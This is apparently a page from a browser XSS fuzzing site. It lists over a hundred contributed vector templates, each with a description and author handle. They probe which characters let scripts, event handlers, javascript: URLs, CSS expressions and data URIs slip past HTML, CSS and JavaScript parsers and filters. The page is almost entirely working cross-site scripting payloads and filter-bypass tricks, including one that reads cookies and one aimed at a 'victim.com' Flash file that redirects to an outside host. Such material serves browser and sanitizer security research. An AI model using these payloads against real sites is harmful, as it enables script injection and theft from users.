Featured vector
IE 11.0
<!-- sample vector --> <img src="xx:xx0x22onerror=alert(1)>
<!-- sample vector --> <img src="xx:xx0x22onerror=alert(1)>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml
3,344,426 Successful fuzzes
Fuzz Vectors
Searching for "XSS"
Your browser identified asGeneral Crawlers unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| On Event Header Based Testing | <img src=x *chr*onError="javascript:log(*num*)"/> | @1baicai1 |
| Equal | <img src="about:blank" onerror*chr*logChr(*num*)> | @synackozgur |
| Characters used for event handlers instead of equal sign | <img src*chr*"about:blank"> | @synackozgur |
| charsThatCloseAMutatedComment | <script> t = document.createElement('template'); t.innerHTML = '</*chr*<img src=xx:xx onerror=log(*num*)>'; document.body.appendChild(t); </script> | @salchoman |
| allowed characters in entities | <a id="fuzzelement*num*" href="javascript&col*chr*on;alert">aaa</a> <script> if(document.getElementById('fuzzelement*num*').protocol==='javascript:'){ logChr(*num*); } </script> | @insertScript |
| eating char (please god help ) | <!-- sample vector --> <img src=x *chr*> onerror=logChr(*num*)> | @missoum1307 |
| eating char | <!-- sample vector --> <img src=x *chr*> onerror=logChr(*num*)> | @missoum1307 |
| doc property hijack with iframe v3 | <script> var testpad = document.createElement("iframe"); testpad.name="dummy"; document.body.appendChild(testpad); for(props in document){ testpad.name = props; if (document[props]+"" === "[object Window]") { customLog(props) } } </script> | @insertScript |
| overwrite cookies test case | <*datahtmlelements* name="cookie"></*datahtmlelements*> <script> window.addEventListener("load",function(){ for(a in document.cookie){ customLog(document.cookie[a].tagName); } },false); </script> | @insertScript |
| Comma analog in script src data | <script src=data:*chr*logChr(*num*)></script> | @i_bo0om |
| Characters that break out of css urls latest | <div id="fuzzelement*num*" style="background:url(about:blank?*chr*;color:#000000;x:);"></div> | @garethheyes |
| Characters that end script tags | <script*chr*test>logChr(*num*)</script> | @JohnathanKuskos |
| Characters allowed before tagname in IE v2 | <*chr*div style="x:expression(logChr(*num*))"> | @albinowax |
| Possibility of XSS via lead bytes | <html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="*chr*"></p> <p><input size=20 value="<script>logChr(*num*)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html> | @irsdl |
| Characters allowed at the start of a namespace | <*chr*foo:img src="xx:xx" id="baz*num*" /> <script> if(document.getElementById("baz*num*")) { logChr(*num*); } </script> | @agasfasgasdasds |
| rand chr after opening tag | <*chr*img/src=xx:xx on*chr*error=logChr(*num*)> | @mehimansu |
| prompt | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> | @sharath_unni |
| Characters that close a HTML comment 0021 | <!--*chr*><img src=xxx:x onerror=log(*num*)> --> | @matttiko |
| script var separator | <script> var a = "olol123*chr* <logChr(*num*)// </script> | @i_bo0om |
| svg animate onbegin | <svg id="svg" xmlns="http://www.w3.org/2000/svg"> <rect id="rectID" width="100" height="100" fill="green"> <animate id="selfID" onbegin=logChr(*num*) attributeName="x" begin="0s; selfID.end" dur="0.5s" from="0" to="100"/> </rect> </svg> | @JohnathanKuskos |
| char after lt and before still valid html | <*chr*,script>logChr(*num*);</script> | @p_laguna |
| object data separator | <object*chr*data="data:text/html;base64,PHNjcmlwdD5sb2dDaHIoKm51bSopPC9zY3JpcHQ+"></object> | @i_bo0om |
| Characters that can be used to terminate entities in an href | <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> | @tifkin_ |
| Data URI What can replace the in data | <script src="data*chr*,log(*num*)"></script> | @skeptic_fx |
| Characters allowed between and in HTML entities in style attribute | <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> | @tifkin_ |
| fssadf dfads fdasf | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> | @phpdevops |
| Characters to break VBScript comments | <script language="vbscript"> '*chr*log(*num*)' </script> | @0x6D6172696F |
| im fish | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> | @Mramydnei |
| Characters allowed after domain | <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> | @avlidienbrunn |
| Characters allowed before http | <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> | @avlidienbrunn |
| Protocols before Javascript to run code by using Flash navigateURL | <script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe> | @irsdl |
| chars allowed between js comment v2 | <script>logChr(*num*)*chr*'</script> | @insertScript |
| chars allowed between js comment | <script>logChr(*num*)/*chr*/'</script> | @insertScript |
| allowed char in js comment | <script>logChr(*num*)<*chr*!-- '</script> | @insertScript |
| img onload with only one char in src | <img src=*chr* onload=logChr(*num*)> | @insertScript |
| characters which turn into a comment | <svg><script>lo<*chr*>gChr(*num*)</script></svg> | @insertScript |
| char after lt still valid html | <*chr*a href=x onerror=logChr(*num*)> | @ethicalhack3r |
| lt eating char log | <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> | @insertScript |
| lt eating char v2 | <img src=x *chr*> onerror=logChr(*num*)> | @insertScript |
| lt eating char | <img src=x *chr*> onerror=logChr(*num*)> | @insertScript |
| HTML Entity in between and | <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> | @MisterJyu |
| Characters allowed before slashes no protocol | <a href="*chr*//google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed inside slashes no protocol | <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of slash 2 | <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of slash | <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed after slash | <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed inside http | <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Valid chars before img word in img tag | <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> | @ontrif |
| meta refresh tag content attribute url overwrite | <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> | @olemoudi |
| Characters between time and URL in meta redirects | <meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"> | @avlidienbrunn |
| Characters allowed instead of forward slash in url | <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of colon in js url | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Tags that have the onload event | <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> | @garethheyes |
| Characters consuming spaces between lt and tag name | <*chr* script>logChr(*num*)</script> | @blubbfiction |
| possible chars in base64 encoding | <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> | @heyheyheyhey10 |
| Replacement for s in script tag | <*chr*cript>logChr(*num*)</script> | @blubbfiction |
| Replacement for lt in tag | *chr*script>logChr(*num*)</script> | @blubbfiction |
| Characters inside script tag name | <scr*chr*ipt>logChr(*num*)</script> | @blubbfiction |
| Characters between lt and tag name | <*chr*script>logChr(*num*)</script> | @blubbfiction |
| char for fireing onload event | <img src=*chr* onload=logChr(*num*)> | @heyheyheyhey10 |
| html dataentities before event handler | <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> | @testacc40590139 |
| Character allowed after the slash for end script tag | <script>alert(logChr(*num*))</*chr*script> | @MisterJyu |
| Character allowed before the slash for end script tag | <script>alert(logChr(*num*))<*chr*/script> | @MisterJyu |
| Characters that break out of script variables | <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> | @garethheyes |
| Attribute separators | <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> | @garethheyes |
| Characters separating attributes without quotes after hash | <img src=xx:xx#*chr*/onerror=logChr(*num*)> | @garethheyes |
| Characters separating attributes without quotes | <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> | @garethheyes |
| JS in img src for selfxss | <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> | @ethicalhack3r |
| Char after lt | <*chr*script>alert(*num*)</script> | @ethicalhack3r |
| Determine what character can be at the end of the javascript but before the colon | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> | @MisterJyu |
| Characters to end script tag via JavaScript regex 002 | <script>log(*num*,1</script*chr*//)</script> | @0x6D6172696F |
| Characters to end script tag via JavaScript regex 001 | <script>log(*num*,1</script*chr*/)</script> | @0x6D6172696F |
| Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket | <body> §iframe onload=confirm(/xss/)> <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* | @secalert |
| Alternatives to in attributes | <img src=# onerror*chr*"log(*num*)" > | @albinowax |
| Characters which break attributes without quotes | <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> | @shafigullin |
| Characters allowed after ampersand in named character references | <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters ending HTML closing tags (HTML4) | <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> | @0x6D6172696F |
| Characters consuming backslashes and breaking JS strings | <script>a='abc\*chr*\';log(*num*)//def';</script> | @0x6D6172696F |
| Characters to separate class names in class attributes | <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> | @0x6D6172696F |
| Determine what character can replace in end tags | <script>log(*num*)<*chr*script> | @MisterJyu |
| Characters that close a HTML comment 002 | <!--*chr*<img src=xxx:x onerror=log(*num*)> --> | @0x6D6172696F |
| Characters that close HTML tags | <script>log(*num*)</script*chr* | @0x6D6172696F |
| Characters allowed after script | <script*chr*>log(*num*)</script> | @garethheyes |
| Single character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Entity character breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| determine what characters can be inside a script tag | "`'><sc*chr*ript>log(*num*)</sc*chr*ript> | @MisterJyu |
| determine any chars can go between the onerror attributes | <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> | @MisterJyu |
| Replacement for greater and less than signs (revised) | *chr*script*chr* log(*num*) *chr**chr*script*chr | @MisterJyu |
| Replacement for greater and less than signs | *chr*script*chr alert(1) *chr**chr*script*chr | @MisterJyu |
| Characters breaking innerHTML copy | <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> | @thewildcat |
| Characters escaping JS comment delimiters 001 | <script>/* **chr*/log(*num*)// */</script> | @0x6D6172696F |
| Characters breaking CSS strings allowing expression | "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters ending CSS values allowing expressions | "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters breaking JavaScript Regex delimiter | "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> | @0x6D6172696F |
| Characters in script inside XML elements 004 | "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 003 | <p><svg><script>*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 002 | <p><svg><script>l*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 001 | <p><svg><script>*chr*log(*num*)</script></p> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 002 | <iframe src="vbscript:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 001 | <iframe src="vbs:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters allowed between CSS expression chars 02 | ABC<div style="x:expression*chr*(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS expression chars 01 | ABC<div style="x:exp*chr*ression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed between CSS prop and expression | ABC<div style="x*chr*expression(log(*num*))">DEF | @0x6D6172696F |
| Characters allowed for padding in a data URI 003 | <script src="data:text/plain*chr*log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 002 | <script src="data:*chr*,log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 001 | <script src="data:text/plain,lo*chr*g(*num*)"></script> | @0x6D6172696F |
| Characters before img | "'`><*chr*img src=xxx:x onerror=log(*num*)> | @garethheyes |
| Characters before script | '`"><*chr*script>log(*num*)</script> | @garethheyes |
| Characters in between protocol in js url | <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed after attribute name | `"'><img src=xxx:x onerror*chr*=log(*num*)> | @garethheyes |
| Characters allowed before protocol in js url | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed before colon in js url | <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed before CSS properties | '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> | @garethheyes |
| Characters allowed before attribute name | `"'><img src=xxx:x *chr*onerror=log(*num*)> | @garethheyes |